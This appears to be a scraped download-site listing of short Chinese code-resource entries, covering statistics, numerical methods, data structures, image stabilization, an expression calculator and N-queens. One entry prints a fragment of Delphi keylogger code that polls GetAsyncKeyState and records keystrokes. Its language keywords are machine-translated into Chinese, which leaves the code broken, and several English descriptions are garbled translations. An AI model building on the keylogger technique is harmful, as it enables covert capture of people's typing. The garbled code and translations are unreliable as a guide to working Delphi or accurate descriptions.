-
关于统计学习理论与支持向量机
关于统计学习理论与支持向量机- About statistical study theory and support vector machine
- 2022-10-27 17:05:04下载
- 积分:1
-
概率论与数理统计中的F分布的逆分布,有了它,可以免去查教科书附表的繁琐...
概率论与数理统计中的F分布的逆分布,有了它,可以免去查教科书附表的繁琐-probability theory and mathematical statistics on the F-distribution inverse distribution With it, check the textbook can avoid the cumbersome Schedule
- 2022-03-05 09:12:11下载
- 积分:1
-
用堆实现优先队列
用堆实现优先队列-used Heap priority queue
- 2022-10-31 17:20:02下载
- 积分:1
-
电子稳像
基于灰度投影的电子稳像 opencv1.0 效果一般 需要改进 可以选择高版本的opencv库支持 达到更好的效果
- 2022-11-12 13:55:03下载
- 积分:1
-
通过 Delphi Keyloger 代码
程序 Send(x: string);
开始
form1。Memo1.Lines.Add(x)
结束 ;
程序 TForm1.Timer1Timer(Sender: TObject);
//begin
//if GetAsyncKeyState(Ord("A")) =-32767 然后 send("A") ;
//if GetAsyncKeyState(Ord("B")) =-32767 然后 send("B") ;
var X,y:integer ;
f:char ;
str:string ;
开始
X: = 0 到 255 做
开始
- 2022-06-29 21:37:30下载
- 积分:1
-
对难于时行积分的方程y=x*sin(x),用蒙特卡洛方法进行了求解。
对难于时行积分的方程y=x*sin(x),用蒙特卡洛方法进行了求解。-Difficult when the line integral of the equation y = x* sin (x), using Monte Carlo methods to solve.
- 2022-01-25 15:03:34下载
- 积分:1
-
最小二乘法多次曲线拟合.exe
最小二乘法多次曲线拟合.exe-Using least squares algorithm on Multi-times curve fitting.exe
- 2022-01-24 18:40:38下载
- 积分:1
-
The procedures used to deal with differential equations system to simplify a sys...
该程序用来处理微分方程系统的,用来化简一个微分系统的-The procedures used to deal with differential equations system to simplify a system of differential
- 2022-03-07 06:05:14下载
- 积分:1
-
表达式计算器
/* 表达式计算 */
/* 调用方式:CalcExp("1+max(0.5,sin(1))+sum(1,2^3,mod(5,3))", res, infoStr) */
/* 带符号参数调用方法,先调用符号定义AddSignParam,再调用 CalcExp: */
/* AddSignParam(["a","s"], [1, 0.5]); 或者 AddSignParam("a=1,s=0.5") */
/* CalcExp("1+a+sin(s)", res, infoStr) */
- 2022-03-25 07:34:54下载
- 积分:1
-
皇后问题:在N*N的方格里放置皇后,要求不能放在同一行、同一列、同一对角线上。输入所有适合条件的情况。...
皇后问题:在N*N的方格里放置皇后,要求不能放在同一行、同一列、同一对角线上。输入所有适合条件的情况。-Queen : N* N in the box, placed the empress, on the request can not be the same line, the same series on the same diagonal. The importation of all suitable conditions.
- 2022-06-27 06:25:57下载
- 积分:1